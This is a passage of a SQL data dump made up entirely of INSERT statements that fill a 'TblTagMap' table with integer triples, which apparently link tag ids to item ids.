INSERT INTO "TblTagMap" VALUES(351,33,128);
INSERT INTO "TblTagMap" VALUES(352,1,129);
INSERT INTO "TblTagMap" VALUES(353,1,130);
INSERT INTO "TblTagMap" VALUES(354,2,130);
INSERT INTO "TblTagMap" VALUES(355,45,130);
INSERT INTO "TblTagMap" VALUES(356,1,131);
INSERT INTO "TblTagMap" VALUES(357,7,131);
INSERT INTO "TblTagMap" VALUES(358,8,131);
INSERT INTO "TblTagMap" VALUES(359,36,131);
INSERT INTO "TblTagMap" VALUES(360,37,131);
INSERT INTO "TblTagMap" VALUES(361,33,131);
INSERT INTO "TblTagMap" VALUES(362,1,132);
INSERT INTO "TblTagMap" VALUES(363,7,132);
INSERT INTO "TblTagMap" VALUES(364,36,132);
INSERT INTO "TblTagMap" VALUES(365,37,132);
INSERT INTO "TblTagMap" VALUES(366,8,132);
INSERT INTO "TblTagMap" VALUES(367,3,133);
INSERT INTO "TblTagMap" VALUES(368,5,133);
INSERT INTO "TblTagMap" VALUES(369,8,133);
INSERT INTO "TblTagMap" VALUES(370,37,133);
INSERT INTO "TblTagMap" VALUES(371,36,133);
INSERT INTO "TblTagMap" VALUES(372,33,133);
INSERT INTO "TblTagMap" VALUES(373,16,134);
INSERT INTO "TblTagMap" VALUES(374,45,134);
INSERT INTO "TblTagMap" VALUES(375,16,135);
INSERT INTO "TblTagMap" VALUES(376,45,135);
INSERT INTO "TblTagMap" VALUES(377,16,136);
INSERT INTO "TblTagMap" VALUES(378,45,136);
INSERT INTO "TblTagMap" VALUES(379,16,137);
INSERT INTO "TblTagMap" VALUES(380,45,137);
INSERT INTO "TblTagMap" VALUES(381,16,138);
INSERT INTO "TblTagMap" VALUES(382,45,138);
INSERT INTO "TblTagMap" VALUES(383,1,139);
INSERT INTO "TblTagMap" VALUES(384,2,139);
INSERT INTO "TblTagMap" VALUES(385,1,140);
INSERT INTO "TblTagMap" VALUES(386,33,140);
INSERT INTO "TblTagMap" VALUES(387,42,140);
INSERT INTO "TblTagMap" VALUES(388,0,141);
INSERT INTO "TblTagMap" VALUES(389,42,141);
INSERT INTO "TblTagMap" VALUES(390,17,141);
INSERT INTO "TblTagMap" VALUES(391,0,142);
INSERT INTO "TblTagMap" VALUES(392,42,142);
INSERT INTO "TblTagMap" VALUES(393,17,142);
INSERT INTO "TblTagMap" VALUES(394,1,143);
INSERT INTO "TblTagMap" VALUES(395,33,143);
INSERT INTO "TblTagMap" VALUES(396,42,143);
INSERT INTO "TblTagMap" VALUES(397,7,144);
INSERT INTO "TblTagMap" VALUES(398,17,144);
INSERT INTO "TblTagMap" VALUES(399,0,144);
INSERT INTO "TblTagMap" VALUES(400,33,145);
INSERT INTO "TblTagMap" VALUES(401,0,145);
INSERT INTO "TblTagMap" VALUES(402,42,145);
INSERT INTO "TblTagMap" VALUES(403,8,146);
INSERT INTO "TblTagMap" VALUES(404,1,146);
INSERT INTO "TblTagMap" VALUES(405,0,146);
INSERT INTO "TblTagMap" VALUES(406,51,146);
INSERT INTO "TblTagMap" VALUES(407,0,147);
INSERT INTO "TblTagMap" VALUES(408,2,147);
INSERT INTO "TblTagMap" VALUES(409,52,148);
INSERT INTO "TblTagMap" VALUES(410,17,148);
INSERT INTO "TblTagMap" VALUES(411,21,149);
INSERT INTO "TblTagMap" VALUES(412,17,149);
INSERT INTO "TblTagMap" VALUES(413,11,149);
INSERT INTO "TblTagMap" VALUES(414,7,149);
INSERT INTO "TblTagMap" VALUES(415,0,149);
INSERT INTO "TblTagMap" VALUES(416,53,149);
INSERT INTO "TblTagMap" VALUES(417,53,150);
INSERT INTO "TblTagMap" VALUES(418,33,150);
INSERT INTO "TblTagMap" VALUES(419,21,150);
INSERT INTO "TblTagMap" VALUES(420,7,150);
INSERT INTO "TblTagMap" VALUES(421,0,150);
INSERT INTO "TblTagMap" VALUES(422,11,150);
INSERT INTO "TblTagMap" VALUES(423,0,151);
INSERT INTO "TblTagMap" VALUES(424,18,151);
INSERT INTO "TblTagMap" VALUES(425,17,152);
INSERT INTO "TblTagMap" VALUES(426,0,152);
INSERT INTO "TblTagMap" VALUES(427,51,153);
INSERT INTO "TblTagMap" VALUES(428,0,153);
INSERT INTO "TblTagMap" VALUES(429,1,154);
INSERT INTO "TblTagMap" VALUES(430,7,154);
INSERT INTO "TblTagMap" VALUES(431,33,154);
INSERT INTO "TblTagMap" VALUES(432,16,155);
INSERT INTO "TblTagMap" VALUES(433,16,156);
INSERT INTO "TblTagMap" VALUES(434,16,157);
INSERT INTO "TblTagMap" VALUES(435,16,158);
INSERT INTO "TblTagMap" VALUES(436,16,159);
INSERT INTO "TblTagMap" VALUES(437,16,160);
INSERT INTO "TblTagMap" VALUES(438,1,161);
INSERT INTO "TblTagMap" VALUES(439,42,161);
INSERT INTO "TblTagMap" VALUES(440,50,161);
INSERT INTO "TblTagMap" VALUES(441,1,162);
INSERT INTO "TblTagMap" VALUES(442,42,162);
INSERT INTO "TblTagMap" VALUES(443,50,162);
INSERT INTO "TblTagMap" VALUES(444,1,163);
INSERT INTO "TblTagMap" VALUES(445,42,163);
INSERT INTO "TblTagMap" VALUES(446,50,163);
INSERT INTO "TblTagMap" VALUES(447,34,164);
INSERT INTO "TblTagMap" VALUES(448,50,164);
INSERT INTO "TblTagMap" VALUES(449,42,164);
INSERT INTO "TblTagMap" VALUES(450,50,165);
INSERT INTO "TblTagMap" VALUES(451,1,165);
INSERT INTO "TblTagMap" VALUES(452,42,165);
INSERT INTO "TblTagMap" VALUES(453,30,166);
INSERT INTO "TblTagMap" VALUES(454,50,166);
INSERT INTO "TblTagMap" VALUES(455,29,166);
INSERT INTO "TblTagMap" VALUES(456,30,167);
INSERT INTO "TblTagMap" VALUES(457,50,167);
INSERT INTO "TblTagMap" VALUES(458,29,167);
INSERT INTO "TblTagMap" VALUES(459,50,168);
INSERT INTO "TblTagMap" VALUES(460,30,168);
INSERT INTO "TblTagMap" VALUES(461,29,168);
INSERT INTO "TblTagMap" VALUES(462,50,169);
INSERT INTO "TblTagMap" VALUES(463,30,169);
INSERT INTO "TblTagMap" VALUES(464,54,169);
INSERT INTO "TblTagMap" VALUES(465,50,170);
INSERT INTO "TblTagMap" VALUES(466,29,170);
INSERT INTO "TblTagMap" VALUES(467,30,170);
INSERT INTO "TblTagMap" VALUES(468,50,171);
INSERT INTO "TblTagMap" VALUES(469,30,171);
INSERT INTO "TblTagMap" VALUES(470,29,171);
INSERT INTO "TblTagMap" VALUES(471,29,172);
INSERT INTO "TblTagMap" VALUES(472,20,173);
INSERT INTO "TblTagMap" VALUES(473,0,173);
INSERT INTO "TblTagMap" VALUES(474,7,173);
INSERT INTO "TblTagMap" VALUES(475,20,174);
INSERT INTO "TblTagMap" VALUES(476,7,174);
INSERT INTO "TblTagMap" VALUES(477,0,174);
INSERT INTO "TblTagMap" VALUES(478,20,175);
INSERT INTO "TblTagMap" VALUES(479,0,175);
INSERT INTO "TblTagMap" VALUES(480,7,175);
INSERT INTO "TblTagMap" VALUES(481,37,175);
INSERT INTO "TblTagMap" VALUES(482,37,176);
INSERT INTO "TblTagMap" VALUES(483,7,176);
INSERT INTO "TblTagMap" VALUES(484,0,176);
INSERT INTO "TblTagMap" VALUES(485,20,176);
INSERT INTO "TblTagMap" VALUES(486,7,177);
INSERT INTO "TblTagMap" VALUES(487,55,177);
INSERT INTO "TblTagMap" VALUES(488,7,178);
INSERT INTO "TblTagMap" VALUES(489,56,178);
INSERT INTO "TblTagMap" VALUES(490,7,179);
INSERT INTO "TblTagMap" VALUES(491,17,179);
INSERT INTO "TblTagMap" VALUES(492,0,179);
INSERT INTO "TblTagMap" VALUES(493,3,180);
INSERT INTO "TblTagMap" VALUES(494,17,180);
INSERT INTO "TblTagMap" VALUES(495,7,180);
INSERT INTO "TblTagMap" VALUES(496,0,180);
INSERT INTO "TblTagMap" VALUES(497,7,181);
INSERT INTO "TblTagMap" VALUES(498,19,181);
INSERT INTO "TblTagMap" VALUES(499,5,181);
INSERT INTO "TblTagMap" VALUES(500,0,181);
INSERT INTO "TblTagMap" VALUES(501,37,182);
INSERT INTO "TblTagMap" VALUES(502,36,182);
INSERT INTO "TblTagMap" VALUES(503,0,182);